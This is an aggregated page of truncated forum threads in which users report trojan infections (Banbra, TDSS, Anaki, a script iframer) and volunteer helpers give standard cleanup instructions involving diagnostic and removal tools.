 DDS.txt   8.95KB
  5 downloads
 Attach.txt   2.16KB
  2 downloads
 ark.txt   320.57KB
  3 downloads
-----
I must admit that I have been impatient and have continued to run scans in attempts to "do something"
So, I may need to post new logs whenever I get a helper assigned to my case.
The trojan appears to have mutated from Trojan-Banker.Win32.Banbra.aedx to Trojan-Dropper.Win32.TDSS.abhd

A:Trojan-Banker and HEUR:Exploit.Script.Generic and Google Redirect

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems. Somethings to remember while we are working together.Do not run any other tool untill instructed to do so!Please Do not Attach logs or put in code boxes.Tell me about any problems that have occurred during the fix.Tell me of any other symptoms you may be having as these can help also.Do not run anything while running a fix.We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.Click on the Watch Topic Button and select Immediate Notification and click on proceed, this will help you to get notified faster when I have replied and make the cleaning process faster.In order for me to see the status of the infection I will need a new set of logs to start with.Please print out or make a copy in notpad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.DeFogger: Please download DeFogger to your desktop.

Double click DeFogger to run the tool.
The application window will appear Click the Disable button to disable your CD Emulation drivers Click Yes to continue A 'Finished!' message will ap... Read more

23 more replies
Answer Match 49.14%

Hi,
I hope you can help. A few months ago Microsoft Security Essentials (MSE) detected and attempted to remove a trojan called win32/Anaki.A!plock. MSE would display an information window which said it had successfully removed the treat and no further action was required only for it to reappear again within a minute. See a screenshot of the MSE history tab attached. The information that Microsoft has about win32/Anaki.A!plock is very vague/generic and I cannot find any more information on it or if other vendors have it listed under another name. After trying many different scanners with no luck I discovered that in the same folder as the infected file was another suspicious looking file (see attached). I tried to remove that file but windows would not let me because it was "open by the WMI Driver Service" I was able to remove the suspect file by starting the PC with a portable Linux OS. I restarted the PC and the trojan was gone. A month passed with no infection and then it reappeared. I removed it again using the same method. This time it was only a couple of weeks before the trojan reappeared. I did it again and this time it was less than a week before it appeared again.
I decided to remove MSE and the offending file then install a trial version of Norton AV. I was hoping it would detect the same infection and remove it fully. Also Norton's may have more information on it. Four days after the install Norton's it detected it as SAPE.Heur.3185. The behaviour of Norton's ... Read more

A:Trojan win32/Anaki.A!plock or SAPE.Heur.3185 unable to remove

Hi there,my name is Marius and I will assist you with your malware related problems.Before we move on, please read the following points carefully.First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.Perform everything in the correct order. Sometimes one step requires the previous one.If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem.Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.Important: To help me reviewing your logs, please post them in code boxes. You can create them by clicking on the <>-symbol on top of the reply window.    HijackThis is not the preferred initial scanning tool in this forum. With today's malware, a more comprehensive set of logs i... Read more

16 more replies
Answer Match 48.3%

Two days ago, I was browsing as per normal through Chrome when Kaspersky encountered and blocked the trojan detailed above.  Since it declared the program was blocked, I thought nothing of it after doing a cursory Malwarebytes scan, and another with Kaspersky.  
 
Today I rebooted my computer for the first time since that warning, and the first thing I noticed was a little lockpad-shaped icon down in my toolbar that appeared and disappeared fairly quickly (it's apparently some kind of windows process according to my googling).   When I tried to access Chrome it refused to launch, even though the program existed in the task manager.  I rebooted the computer several times only for the same thing to happen.  It finally successfully launched about an hour later, and it appears to be running normally but since that's super abnormal for my fairly new PC I thought I'd check in for some advice.  Is there a remnant of the trojan on my computer or was it just a fluke?
 
ETA: I get a message when I try to check for Windows updates that the server isn't running and I should relaunch Windows.

A:Chrome takes a time to launch after Kaspersky blocks HEUR: Trojan.Script.Iframer

Download Security Check from here or here and save it to your Desktop. Double-click SecurityCheck.exe Follow the onscreen instructions inside of the black box. A Notepad document should open automatically called checkup.txt; please post the contents of that document.NOTE 1. If one of your security applications (e.g., third-party firewall) requests permission to allow DIG.EXE access the Internet, allow it to do so.NOTE 2. SecurityCheck may produce some false warning(s), so leave the results reading to me.NOTE 3. If you receive UNSUPPORTED OPERATING SYSTEM! ABORTED! message restart computer and Security Check should run Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.Make sure the following options are checked:
Internet ServicesWindows FirewallSystem RestoreSecurity Center/Action CenterWindows UpdateWindows DefenderOther ServicesPress "Scan".It will create a log (FSS.txt) in the same directory the tool is run.Please copy and paste the log to your reply. Please download MiniToolBox and run it.Checkmark following boxes:Report IE Proxy SettingsReport FF Proxy SettingsList content of HostsList IP configurationList Winsock EntriesList last 10 Event Viewer logList Installed ProgramsList Devices (do NOT change any settings here)List Users, Partitions and Memory sizeList Restore PointsClick Go and post the result. Please download Malwarebytes Anti-Malware (MBAM) to your desktop.NOTE. If you already have MBAM 2.0 installed scroll down.Double-click ... Read more

30 more replies